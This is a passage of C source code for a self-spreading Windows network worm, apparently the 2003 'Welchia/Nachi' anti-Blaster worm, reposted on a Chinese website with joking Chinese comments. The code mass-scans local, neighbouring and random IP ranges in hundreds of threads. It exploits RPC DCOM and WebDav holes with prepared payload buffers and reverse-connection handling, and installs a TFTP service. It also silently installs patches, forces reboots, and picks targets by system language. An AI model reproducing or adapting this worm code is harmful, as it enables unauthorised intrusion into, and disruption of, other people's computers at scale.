nLanguageID = 1; //就是为这个来的~~
else if ( unOemCP == 950 && wMain == 4 && wSub == 1 ) //tw
nLanguageID = 2; //同胞骨肉的忙,一定要帮~~
else if ( unOemCP == 932 && wMain == 0x11 && wSub == 1 ) //jp
nLanguageID = -1; //偶好有干掉鬼子机器的冲动!
//罢了,冤冤相报何时了~~~ 希望他丫的自新
~~~ 再玩火就灭了他丫的~~
else if ( unOemCP == 949 && wMain == 0x12 && wSub == 1 ) //kr
nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~
else{
nLanguageID = -1;
}

if ( nLanguageID == -1)
return FALSE;

char szServicePack = "RpcServicePack.exe";

// downlaod it~~~
if ( !nSystemVer ) { // 2k
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl) )
return FALSE;
}
else{
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl) )
return FALSE;
}

char szExec;
sprintf(szExec, "%s -n -o -z -q", szServicePack);

HANDLE hProcess = MakeProcess( szExec );
if ( hProcess == NULL )
return FALSE;

if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内
未完成
TerminateProcess(hProcess,1);
CloseHandle(hProcess);
DeleteFile(szServicePack);
return FALSE;
}
CloseHandle(hProcess);

Sleep(15000);
DeleteFile(szServicePack);
if ( ReadRegServicePack(nSystemVer) ) {
ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot
it~~~
Sleep(20000); //说偶重启有过? 不重启补丁无效,
找 Bill该死 说去~~~
}

return TRUE;
}

// IN: 始ip, B段数量, 是否随机,是否换WebDav //更烂~~~ 凑合着看~~~
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL
bWebDav)
{
HANDLE hThread = NULL;
BOOL bFirst = TRUE;
u_long uComp;

for (int i=0;i< (nBCount * 256 * 256); i++){

if ( bRand )
uComp = MakeRandIp();
else
uComp = i + ulIpStart;

if ( //还是屏蔽掉部分目标,免得目标中招后,再玩就把下一代干掉了,不破坏的好
:)~~~
(BYTE)uComp == 0xc5 ||
(BYTE)(uComp>>8) == 0xc5 ||
(BYTE)(uComp>>16) == 0xc5 ||
(BYTE)(uComp>>24) == 0xc5 ||
(WORD)uComp == 0x9999 ||
(WORD)(uComp>>8) == 0x9999 ||
(WORD)(uComp>>16) == 0x9999 )
continue;


u_long *myPara = new u_long;

if ( myPara == NULL ){//如果分配失败,再尝试一次
Sleep(100);
myPara = new u_long;
}

if ( myPara ){
if ( hThread )
CloseHandle(hThread);

*myPara = htonl( uComp);

DWORD dwThreadId;

if (bWebDav)
hThread =
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,&dwThreadId);
else
hThread =
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,&dwThreadId);


Sleep(2);
}

//添加此处代码,避免首次执行时,线程中的
InterlockedIncrement(&g_CurThreadCount) 未来得及运行,一次性建立了N个线程

bug!
if ( bFirst && (i >= nMaxThread) ){
Sleep(2000);
bFirst = FALSE;
}

while(g_CurThreadCount >= nMaxThread) // #define nMaxThread 300 ,不小心,
玩过了~~~
Sleep(2);

}

Sleep(60000);
}


//服务模式和控制台模式公用主程序
void DoIt()
{
WSADATAwsd;
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
return;

//杀蠕虫
KillMsblast();

//卸载
SYSTEMTIME st;
GetLocalTime(&st);
if ( st.wYear == 2004 ){
MyDeleteService(szServiceName);
MyDeleteService(szServiceTftpd);
RemoveMe();
ExitProcess(1); //其实不必,RemoveMe()中借用了前辈的代码,2k下,退出程序时将

自身文件删除了
}

srand( GetTickCount() );

memset(pPingBuffer, '\xAA', sizeof(pPingBuffer));
//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补
丁已经打够了!~~~


//准备WebDav发送缓冲区
do{
pWebDavExploitBuffer = new char;
Sleep(100);
}while(pWebDavExploitBuffer == NULL);

//必须在checkonlien 之前,一次装配好子弹
PressWebDavBufferOnce();
PressRpcDcomBufferOnce();

CheckOnlienAndPressData(); //get LocalIp & 修正子弹中的反向ip 和 端口

//打补丁
DoServicePackFunction();

//建立接收线程
DWORD dwThreadID;
HANDLE
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L
 
PVOID)NULL,0,&dwThreadID);
if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞,有反连,再建线程处理之,
同时处理多个反连
return;
CloseHandle(hWorkThread);

if ( !MyStartService(szServiceTftpd) ){
Sleep(1000);
InstallTftpService();
Sleep(1000);
MyStartService(szServiceTftpd);
}

Sleep(2000); //等待接收线程中的全局 rand bind port


u_long ulIP;
for(;;){ //估算了一下,普通机器2小时一循环


//首先扫描本ip段
CheckOnlienAndPressData();
ulIP = ntohl(inet_addr(szLocalIp));
ulIP &= 0xffff0000;
BeginExploitFunction( ulIP, 1, 0, 0);


//再扫描本ip前后3个段
CheckOnlienAndPressData();
if ( rand() % 2)
ulIP += 0x00010000;
else
ulIP -= 0x00030000;
BeginExploitFunction( ulIP, 3, 0, 0);


//再扫描WebDav一个段,跳出 135 syn封锁
CheckOnlienAndPressData();
ulIP = MAKELONG(0, wdIpHead); //请 wdIpHead B段IP商注意~~~,
立即采取补救措施~~~ sorry~~~
BeginExploitFunction( ulIP, 1, 0, 1);


//再扫描随机的IP, 数量1个 B段, rpc or webdav
CheckOnlienAndPressData();
if ( rand() % 2)
BeginExploitFunction( ulIP, 1, 1, 0);
else
BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~


KillMsblast();

}

//WSACleanup();

}



========== * * * * * ==========
上级目录
Copyright © 2001-2025 枫林在线(www.FengLin.info)
All Rights Reserved